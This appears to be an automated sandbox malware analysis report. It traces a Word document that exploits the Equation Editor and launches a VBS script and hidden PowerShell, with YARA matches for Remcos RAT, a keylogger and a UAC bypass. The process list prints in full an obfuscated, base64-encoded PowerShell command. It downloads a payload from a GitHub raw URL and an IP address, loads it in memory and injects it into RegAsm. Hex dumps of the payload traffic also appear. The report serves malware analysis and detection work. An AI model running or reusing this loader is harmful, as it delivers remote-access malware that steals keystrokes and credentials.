                                                                                                                        2024-09-30 13:00:22 UTC1378INData Raw: 4f 4a 50 2f 2f 2f 38 43 46 48 30 51 41 41 41 45 49 41 55 41 41 41 41 34 67 76 2f 2f 2f 77 4a 37 45 41 41 41 42 43 67 45 41 41 41 72 49 41 45 41 41 41 42 2b 68 42 41 41 42 48 74 63 45 41 41 45 4f 6d 50 2f 2f 2f 38 6d 49 41 45 41 41 41 41 34 57 50 2f 2f 2f 79 6f 71 41 6e 73 50 41 41 41 45 4b 41 55 41 41 43 73 67 41 41 41 41 41 48 36 45 45 41 41 45 65 78 6b 51 41 41 51 35 4e 2f 2f 2f 2f 79 59 67 41 41 41 41 41 44 67 73 2f 2f 2f 2f 41 41 41 6d 66 68 45 41 41 41 51 55 2f 67 45 71 41 41 41 61 66 68 45 41 41 41 51 71 41 43 72 2b 43 51 41 41 62 77 30 41 41 41 6f 71 41 43 72 2b 43 51 41 41 62 77 63 41 41 41 6f 71 41 43 72 2b 43 51 41 41 62 31 30 41 41 41 59 71 41 44 34 41 2f 67 6b 41 41 50 34 4a 41 51 41 6f 62 77 41 41 42 69 6f 36 2f 67 6b 41 41 50 34 4a 41 51 42
                                                                                                                        Data Ascii: OJP///8CFH0QAAAEIAUAAAA4gv///wJ7EAAABCgEAAArIAEAAAB+hBAABHtcEAAEOmP///8mIAEAAAA4WP///yoqAnsPAAAEKAUAACsgAAAAAH6EEAAEexkQAAQ5N////yYgAAAAADgs////AAAmfhEAAAQU/gEqAAAafhEAAAQqACr+CQAAbw0AAAoqACr+CQAAbwcAAAoqACr+CQAAb10AAAYqAD4A/gkAAP4JAQAobwAABio6/gkAAP4JAQB
                                                                                                                        2024-09-30 13:00:22 UTC1378INData Raw: 67 41 41 41 5a 7a 45 41 41 41 43 6e 4d 52 41 41 41 4b 66 52 41 41 41 41 51 67 41 67 41 41 41 48 36 45 45 41 41 45 65 32 34 51 41 41 51 35 41 50 37 2f 2f 79 59 67 48 51 41 41 41 44 6a 31 2f 66 2f 2f 41 78 38 51 4b 4e 45 43 41 41 59 35 4a 41 49 41 41 43 41 4f 41 41 41 41 66 6f 51 51 41 41 52 37 4a 68 41 41 42 44 6e 55 2f 66 2f 2f 4a 69 41 44 41 41 41 41 4f 4d 6e 39 2f 2f 38 43 65 78 59 41 41 41 51 52 42 68 45 48 49 50 2f 2f 2f 33 39 66 63 31 67 41 41 41 5a 76 45 67 41 41 43 69 41 52 41 41 41 41 66 6f 51 51 41 41 52 37 55 78 41 41 42 44 71 62 2f 66 2f 2f 4a 69 41 61 41 41 41 41 4f 4a 44 39 2f 2f 38 43 63 78 4d 41 41 41 70 39 46 67 41 41 42 43 41 48 41 41 41 41 4f 48 76 39 2f 2f 38 52 42 79 41 41 41 41 43 41 58 7a 6c 4a 41 51 41 41 49 41 55 41 41 41 41 34 5a
                                                                                                                        Data Ascii: gAAAZzEAAACnMRAAAKfRAAAAQgAgAAAH6EEAAEe24QAAQ5AP7//yYgHQAAADj1/f//Ax8QKNECAAY5JAIAACAOAAAAfoQQAAR7JhAABDnU/f//JiADAAAAOMn9//8CexYAAAQRBhEHIP///39fc1gAAAZvEgAACiARAAAAfoQQAAR7UxAABDqb/f//JiAaAAAAOJD9//8CcxMAAAp9FgAABCAHAAAAOHv9//8RByAAAACAXzlJAQAAIAUAAAA4Z
                                                                                                                        2024-09-30 13:00:22 UTC1378INData Raw: 41 41 42 2b 68 42 41 41 42 48 73 78 45 41 41 45 4f 6b 6a 2f 2f 2f 38 6d 49 41 41 41 41 41 41 34 50 66 2f 2f 2f 7a 6a 53 2f 2f 2f 2f 49 41 55 41 41 41 41 34 4c 76 2f 2f 2f 77 41 6f 55 67 41 41 42 68 45 42 4b 46 4d 41 41 41 59 54 42 53 41 41 41 41 41 41 66 6f 51 51 41 41 52 37 5a 78 41 41 42 44 6f 50 41 41 41 41 4a 69 41 41 41 41 41 41 4f 41 51 41 41 41 44 2b 44 41 49 41 52 51 45 41 41 41 41 46 41 41 41 41 4f 41 41 41 41 41 44 64 5a 77 41 41 41 43 59 67 41 41 41 41 41 48 36 45 45 41 41 45 65 30 73 51 41 41 51 36 44 77 41 41 41 43 59 67 41 41 41 41 41 44 67 45 41 41 41 41 2f 67 77 41 41 45 55 43 41 41 41 41 42 51 41 41 41 43 63 41 41 41 41 34 41 41 41 41 41 42 51 54 42 53 41 41 41 41 41 41 66 6f 51 51 41 41 52 37 67 68 41 41 42 44 72 58 2f 2f 2f 2f 4a 69 41
                                                                                                                        Data Ascii: AAB+hBAABHsxEAAEOkj///8mIAAAAAA4Pf///zjS////IAUAAAA4Lv///wAoUgAABhEBKFMAAAYTBSAAAAAAfoQQAAR7ZxAABDoPAAAAJiAAAAAAOAQAAAD+DAIARQEAAAAFAAAAOAAAAADdZwAAACYgAAAAAH6EEAAEe0sQAAQ6DwAAACYgAAAAADgEAAAA/gwAAEUCAAAABQAAACcAAAA4AAAAABQTBSAAAAAAfoQQAAR7ghAABDrX////JiA
                                                                                                                        2024-09-30 13:00:22 UTC1378INData Raw: 59 67 43 41 41 41 41 44 67 4a 2f 76 2f 2f 45 51 45 6f 53 77 41 41 42 68 4d 48 49 41 73 41 41 41 41 34 39 76 33 2f 2f 78 45 4a 4b 68 45 41 65 78 67 41 41 41 51 6f 56 77 41 41 42 6e 4d 67 41 41 41 47 45 77 6b 67 42 67 41 41 41 44 6a 57 2f 66 2f 2f 4f 4e 37 2f 2f 2f 38 67 44 41 41 41 41 48 36 45 45 41 41 45 65 7a 38 51 41 41 51 36 76 66 33 2f 2f 79 59 67 44 67 41 41 41 44 69 79 2f 66 2f 2f 41 6e 73 54 41 41 41 45 45 51 51 52 42 53 68 57 41 41 41 47 45 77 67 67 42 77 41 41 41 44 69 58 2f 66 2f 2f 41 42 4d 77 41 77 42 39 41 41 41 41 41 51 41 41 45 53 41 43 41 41 41 41 2f 67 34 41 41 44 67 41 41 41 41 41 2f 67 77 41 41 45 55 44 41 41 41 41 57 51 41 41 41 41 55 41 41 41 41 76 41 41 41 41 4f 46 51 41 41 41 41 43 63 77 34 41 41 41 70 39 45 41 41 41 42 43 41 41 41
                                                                                                                        Data Ascii: YgCAAAADgJ/v//EQEoSwAABhMHIAsAAAA49v3//xEJKhEAexgAAAQoVwAABnMgAAAGEwkgBgAAADjW/f//ON7///8gDAAAAH6EEAAEez8QAAQ6vf3//yYgDgAAADiy/f//AnsTAAAEEQQRBShWAAAGEwggBwAAADiX/f//ABMwAwB9AAAAAQAAESACAAAA/g4AADgAAAAA/gwAAEUDAAAAWQAAAAUAAAAvAAAAOFQAAAACcw4AAAp9EAAABCAAA
                                                                                                                        2024-09-30 13:00:22 UTC1378INData Raw: 42 68 62 2b 42 43 6f 41 41 41 41 2b 44 77 41 44 4b 48 45 41 41 41 59 57 2f 67 49 57 2f 67 45 71 4d 67 38 41 41 79 68 78 41 41 41 47 46 76 34 43 4b 67 41 41 41 44 34 50 41 41 4d 6f 63 51 41 41 42 68 62 2b 42 42 62 2b 41 53 6f 6d 44 77 41 44 4b 48 49 41 41 41 59 71 41 41 41 79 44 77 41 44 4b 48 49 41 41 41 59 57 2f 67 45 71 41 41 41 41 45 7a 41 44 41 41 6f 42 41 41 41 4b 41 41 41 52 49 41 51 41 41 41 44 2b 44 67 41 41 4f 41 41 41 41 41 44 2b 44 41 41 41 52 51 55 41 41 41 43 4b 41 41 41 41 73 51 41 41 41 41 55 41 41 41 42 67 41 41 41 41 4c 77 41 41 41 44 69 46 41 41 41 41 45 67 45 44 65 78 30 41 41 41 51 6f 48 51 41 41 43 69 6f 43 65 78 34 41 41 41 52 76 48 67 41 41 43 67 4e 37 48 67 41 41 42 43 68 34 41 41 41 47 62 78 38 41 41 41 6f 71 41 69 68 6a 41 41 41
                                                                                                                        Data Ascii: Bhb+BCoAAAA+DwADKHEAAAYW/gIW/gEqMg8AAyhxAAAGFv4CKgAAAD4PAAMocQAABhb+BBb+ASomDwADKHIAAAYqAAAyDwADKHIAAAYW/gEqAAAAEzADAAoBAAAKAAARIAQAAAD+DgAAOAAAAAD+DAAARQUAAACKAAAAsQAAAAUAAABgAAAALwAAADiFAAAAEgEDex0AAAQoHQAACioCex4AAARvHgAACgN7HgAABCh4AAAGbx8AAAoqAihjAAA
                                                                                                                        2024-09-30 13:00:22 UTC1378INData Raw: 2f 2f 2f 78 4d 77 41 77 43 42 41 41 41 41 43 77 41 41 45 53 41 43 41 41 41 41 2f 67 34 41 41 44 67 41 41 41 41 41 2f 67 77 41 41 45 55 44 41 41 41 41 4c 51 41 41 41 44 67 41 41 41 41 46 41 41 41 41 4f 43 67 41 41 41 41 43 41 79 68 37 41 41 41 47 45 77 45 67 41 51 41 41 41 48 36 45 45 41 41 45 65 35 59 51 41 41 51 36 7a 66 2f 2f 2f 79 59 67 41 51 41 41 41 44 6a 43 2f 2f 2f 2f 46 43 6f 52 41 51 51 6f 67 51 41 41 42 69 6f 52 41 54 72 77 2f 2f 2f 2f 49 41 41 41 41 41 42 2b 68 42 41 41 42 48 73 31 45 41 41 45 4f 5a 7a 2f 2f 2f 38 6d 49 41 41 41 41 41 41 34 6b 66 2f 2f 2f 77 41 41 41 42 4d 77 42 41 43 43 41 41 41 41 43 77 41 41 45 53 41 42 41 41 41 41 2f 67 34 41 41 44 67 41 41 41 41 41 2f 67 77 41 41 45 55 44 41 41 41 41 42 51 41 41 41 43 73 41 41 41 42 55 41
                                                                                                                        Data Ascii: ///xMwAwCBAAAACwAAESACAAAA/g4AADgAAAAA/gwAAEUDAAAALQAAADgAAAAFAAAAOCgAAAACAyh7AAAGEwEgAQAAAH6EEAAEe5YQAAQ6zf///yYgAQAAADjC////FCoRAQQogQAABioRATrw////IAAAAAB+hBAABHs1EAAEOZz///8mIAAAAAA4kf///wAAABMwBACCAAAACwAAESABAAAA/g4AADgAAAAA/gwAAEUDAAAABQAAACsAAABUA


                                                                                                                        Click to jump to process

                                                                                                                        Click to jump to process

                                                                                                                        Click to dive into process behavior distribution

                                                                                                                        Click to jump to process

                                                                                                                        Target ID:0
                                                                                                                        Start time:08:59:56
                                                                                                                        Start date:30/09/2024
                                                                                                                        Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                        Wow64 process (32bit):false
                                                                                                                        Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                                                                                                                        Imagebase:0x13f2b0000
                                                                                                                        File size:1'423'704 bytes
                                                                                                                        MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Reputation:high
                                                                                                                        Has exited:true

                                                                                                                        Target ID:8
                                                                                                                        Start time:09:00:14
                                                                                                                        Start date:30/09/2024
                                                                                                                        Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                                                                                                        Imagebase:0x400000
                                                                                                                        File size:543'304 bytes
                                                                                                                        MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Reputation:high
                                                                                                                        Has exited:true

                                                                                                                        Target ID:9
                                                                                                                        Start time:09:00:16
                                                                                                                        Start date:30/09/2024
                                                                                                                        Path:C:\Windows\SysWOW64\wscript.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\picturewithherimagesverygoodforyourhear.Vbs"
                                                                                                                        Imagebase:0x5d0000
                                                                                                                        File size:141'824 bytes
                                                                                                                        MD5 hash:979D74799EA6C8B8167869A68DF5204A
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Reputation:high
                                                                                                                        Has exited:true

                                                                                                                        Target ID:10
                                                                                                                        Start time:09:00:16
                                                                                                                        Start date:30/09/2024
                                                                                                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggKFtTdHJJbkddJHZlUmJvc0VQUkVmZVJFTkNFKVsxLDNdKydYJy1Kb2luJycpICgoKCd7Mn0nKyd1cicrJ2wnKycgPSB7JysnMX0nKydodCcrJ3QnKydwJysnczovLycrJ3InKydhJysndy5naXRoJysndWJ1c2VyY29udGVudC4nKydjJysnb20vTicrJ29EZXRlY3RPJysnbi8nKydOJysnb0RldGUnKydjJysndE9uLycrJ3InKydlZnMnKycvaGVhZHMvbWEnKydpbi8nKydEZXRhJysnaE5vdGgtJysnVi50JysneHR7MX07IHsyfWJhc2UnKyc2NENvbnRlbnQgPSAoTmV3LU9iJysnamVjdCBTeXN0ZW0nKycuJysnTmV0LlcnKydlYkNsaWVudCkuRG8nKyd3bmxvYWRTdHJpJysnbmcoezJ9dXJsKTsnKycgezInKyd9YmluYXInKyd5Q29udGVudCA9IFtTeXN0ZW0uJysnQ29udmUnKydydF06OkZyJysnb21CYScrJ3NlNjRTJysndCcrJ3JpbmcoezJ9YmFzZTY0Q29udGUnKydudCk7IHsyfWFzc2VtYmx5ID0gJysnW1JlZmxlJysnY3RpbycrJ24uQXNzZW1ibHldOjpMJysnb2FkKHsyJysnfWJpJysnbmEnKydyJysneUMnKydvbnRlJysnbnQpOyBbJysnZG5sJysnaWIuJysnSU8uJysnSG9tJysnZV06OicrJ1YnKydBSScrJygnKyd7MH10eCcrJ3QuQycrJ0ZEUicrJ1JXLycrJzA4Lzc3MS42JysnOS40MzEuMTkvLzpwdCcrJ3RoezB9LCB7MH1kZXNhdGl2JysnYWRveycrJzB9JysnLCB7MH1kZXNhJysndGl2YWRveycrJzB9LCcrJyB7MH1kZXNhdGl2JysnYWRvezAnKyd9LCB7MH0nKydSZWdBcycrJ217MH0nKycsIHsnKycwJysnfScrJ3snKycwfSx7MH17MCcrJ30pJykgLWYgIFtDaEFyXTM0LFtDaEFyXTM5LFtDaEFyXTM2KSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                                                                                                                        Imagebase:0x1240000
                                                                                                                        File size:427'008 bytes
                                                                                                                        MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Reputation:high
                                                                                                                        Has exited:true

                                                                                                                        Target ID:12
                                                                                                                        Start time:09:00:18
                                                                                                                        Start date:30/09/2024
                                                                                                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( ([StrInG]$veRbosEPREfeRENCE)[1,3]+'X'-Join'') ((('{2}'+'ur'+'l'+' = {'+'1}'+'ht'+'t'+'p'+'s://'+'r'+'a'+'w.gith'+'ubusercontent.'+'c'+'om/N'+'oDetectO'+'n/'+'N'+'oDete'+'c'+'tOn/'+'r'+'efs'+'/heads/ma'+'in/'+'Deta'+'hNoth-'+'V.t'+'xt{1}; {2}base'+'64Content = (New-Ob'+'ject System'+'.'+'Net.W'+'ebClient).Do'+'wnloadStri'+'ng({2}url);'+' {2'+'}binar'+'yContent = [System.'+'Conve'+'rt]::Fr'+'omBa'+'se64S'+'t'+'ring({2}base64Conte'+'nt); {2}assembly = '+'[Refle'+'ctio'+'n.Assembly]::L'+'oad({2'+'}bi'+'na'+'r'+'yC'+'onte'+'nt); ['+'dnl'+'ib.'+'IO.'+'Hom'+'e]::'+'V'+'AI'+'('+'{0}tx'+'t.C'+'FDR'+'RW/'+'08/771.6'+'9.431.19//:pt'+'th{0}, {0}desativ'+'ado{'+'0}'+', {0}desa'+'tivado{'+'0},'+' {0}desativ'+'ado{0'+'}, {0}'+'RegAs'+'m{0}'+', {'+'0'+'}'+'{'+'0},{0}{0'+'})') -f [ChAr]34,[ChAr]39,[ChAr]36))"
                                                                                                                        Imagebase:0x1240000
                                                                                                                        File size:427'008 bytes
                                                                                                                        MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Yara matches:
                                                                                                                        • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000C.00000002.413003630.00000000036D9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000C.00000002.413003630.00000000036D9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000C.00000002.413003630.00000000036D9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000C.00000002.413003630.00000000036D9000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                        • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000C.00000002.413003630.00000000038F9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000C.00000002.413003630.00000000038F9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000C.00000002.413003630.00000000038F9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000C.00000002.413003630.00000000038F9000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                        Reputation:high
                                                                                                                        Has exited:true

                                                                                                                        Target ID:13
                                                                                                                        Start time:09:00:24
                                                                                                                        Start date:30/09/2024
                                                                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                        Wow64 process (32bit):false
                                                                                                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                                                        Imagebase:0xbf0000
                                                                                                                        File size:64'704 bytes
                                                                                                                        MD5 hash:8FE9545E9F72E460723F484C304314AD
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Reputation:high
                                                                                                                        Has exited:true

                                                                                                                        Target ID:14
                                                                                                                        Start time:09:00:24
                                                                                                                        Start date:30/09/2024
                                                                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                                                        Imagebase:0xbf0000
                                                                                                                        File size:64'704 bytes
                                                                                                                        MD5 hash:8FE9545E9F72E460723F484C304314AD
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Yara matches:
                                                                                                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000E.00000002.924048781.0000000000771000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                        • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                        • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                        Reputation:high
                                                                                                                        Has exited:false

                                                                                                                        Target ID:15
                                                                                                                        Start time:09:00:28
                                                                                                                        Start date:30/09/2024
                                                                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\sdpukoyfqajsixcdwmqaiv"
                                                                                                                        Imagebase:0xbf0000
                                                                                                                        File size:64'704 bytes
                                                                                                                        MD5 hash:8FE9545E9F72E460723F484C304314AD
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Reputation:high
                                                                                                                        Has exited:true

                                                                                                                        Target ID:16
                                                                                                                        Start time:09:00:28
                                                                                                                        Start date:30/09/2024
                                                                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\cxunlhrzeibfklqhoxlbtidgm"
                                                                                                                        Imagebase:0xbf0000
                                                                                                                        File size:64'704 bytes
                                                                                                                        MD5 hash:8FE9545E9F72E460723F484C304314AD
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Reputation:high
                                                                                                                        Has exited:true

                                                                                                                        Target ID:17
                                                                                                                        Start time:09:00:28
                                                                                                                        Start date:30/09/2024
                                                                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                        Wow64 process (32bit):false
                                                                                                                        Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\naaxlzcasqtkurntxhxvwmppvrwa"
                                                                                                                        Imagebase:0xbf0000
                                                                                                                        File size:64'704 bytes
                                                                                                                        MD5 hash:8FE9545E9F72E460723F484C304314AD
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Reputation:high
                                                                                                                        Has exited:true

                                                                                                                        Target ID:18
                                                                                                                        Start time:09:00:28
                                                                                                                        Start date:30/09/2024
                                                                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\naaxlzcasqtkurntxhxvwmppvrwa"
                                                                                                                        Imagebase:0xbf0000
                                                                                                                        File size:64'704 bytes
                                                                                                                        MD5 hash:8FE9545E9F72E460723F484C304314AD
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Has exited:true

                                                                                                                        Reset < >
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000008.00000002.392960157.00000000005BE000.00000004.00000020.00020000.00000000.sdmp, Offset: 005BE000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_8_2_5be000_EQNEDT32.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 386ea918ed199fd13f2663c2e91d039a15c33e6e99aa2ae5b13686ab13c13080
                                                                                                                          • Instruction ID: 94a16b49afb1f6e7b48aede34510609f9dd329a588cde42a3980b672c863af02
                                                                                                                          • Opcode Fuzzy Hash: 386ea918ed199fd13f2663c2e91d039a15c33e6e99aa2ae5b13686ab13c13080
                                                                                                                          • Instruction Fuzzy Hash: 6E52009680E7C15FCB1787B0597AA91BF617E2320430EC6DFC4C68E8A3E359944AD367
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000008.00000002.392960157.00000000005BE000.00000004.00000020.00020000.00000000.sdmp, Offset: 005BE000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_8_2_5be000_EQNEDT32.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 71b8c753247b10540e6e3a152b25a9532216e590ef1c241877cfa5fca5e8dc68
                                                                                                                          • Instruction ID: e149e8707dee6d62ba2629cb86b32d216c2c13b8c55588c593dbc03700f9acb1
                                                                                                                          • Opcode Fuzzy Hash: 71b8c753247b10540e6e3a152b25a9532216e590ef1c241877cfa5fca5e8dc68
                                                                                                                          • Instruction Fuzzy Hash: 24F1125550D3C15FC7278B3899AA4A0BF707E2321070EC6CFD8C98FAA3E3599846D766
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000A.00000002.417687807.000000000015D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0015D000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_10_2_15d000_powershell.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 256baaac9d7502df54dd0f9ca42c55de90ef6165bb53df96fc90c21a6e1012d3
                                                                                                                          • Instruction ID: 86634f138b26dec79ea5471c6fc7f316e3861c88678e0c656e19bbe88a32fc86
                                                                                                                          • Opcode Fuzzy Hash: 256baaac9d7502df54dd0f9ca42c55de90ef6165bb53df96fc90c21a6e1012d3
                                                                                                                          • Instruction Fuzzy Hash: C201DF71404340EAE7304E29E884B66BF98EF41325F28841AFC684E2C6C779984DCBB1
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000A.00000002.417687807.000000000015D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0015D000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_10_2_15d000_powershell.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 3c138a1cfd30f06eaffecda3b22d296013de9e7381b33335a0ebe2bf013098c9
                                                                                                                          • Instruction ID: 0c2e6454d40925a37880d47955effb8bc7e678852e8d54874a8b1c7aed71edc4
                                                                                                                          • Opcode Fuzzy Hash: 3c138a1cfd30f06eaffecda3b22d296013de9e7381b33335a0ebe2bf013098c9
                                                                                                                          • Instruction Fuzzy Hash: 4D01526140D3C09FD7224B259C94B62BFA4DF53225F1980DBE8948F2E7C2699C48C772

                                                                                                                          Execution Graph

                                                                                                                          Execution Coverage:4.5%
                                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                                          Signature Coverage:0%
                                                                                                                          Total number of Nodes:21
                                                                                                                          Total number of Limit Nodes:4
                                                                                                                          execution_graph 8531 2a7928 8532 2a79a3 CreateProcessW 8531->8532 8534 2a7a81 8532->8534 8539 2a7b68 8540 2a7baa 8539->8540 8541 2a7bb4 Wow64SetThreadContext 8539->8541 8540->8541 8542 2a7be2 8541->8542 8543 2a6ef8 8544 2a6f06 8543->8544 8545 2a6e48 ResumeThread 8544->8545 8548 2a6871 8544->8548 8545->8548 8546 2a70a8 VirtualAllocEx 8546->8548 8547 2a7338 8548->8546 8548->8547 8553 2a7ce0 8554 2a7d28 8553->8554 8555 2a7d30 WriteProcessMemory 8553->8555 8554->8555 8556 2a7d6b 8555->8556 8557 2a6b91 8558 2a6871 8557->8558 8559 2a70a8 VirtualAllocEx 8558->8559 8560 2a7338 8558->8560 8559->8558
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000C.00000002.411674608.0000000000450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00450000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_12_2_450000_powershell.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: 4'p$4'p$4'p$4'p$4'p$4'p$L4p$L4p$L4p$$p$$p$$p$$p$$p$$p
                                                                                                                          • API String ID: 0-1547384602
                                                                                                                          • Opcode ID: d10b129c176e3ae5ac06dd0882e8f2f8247b40be312e0ab70bad379cea685368
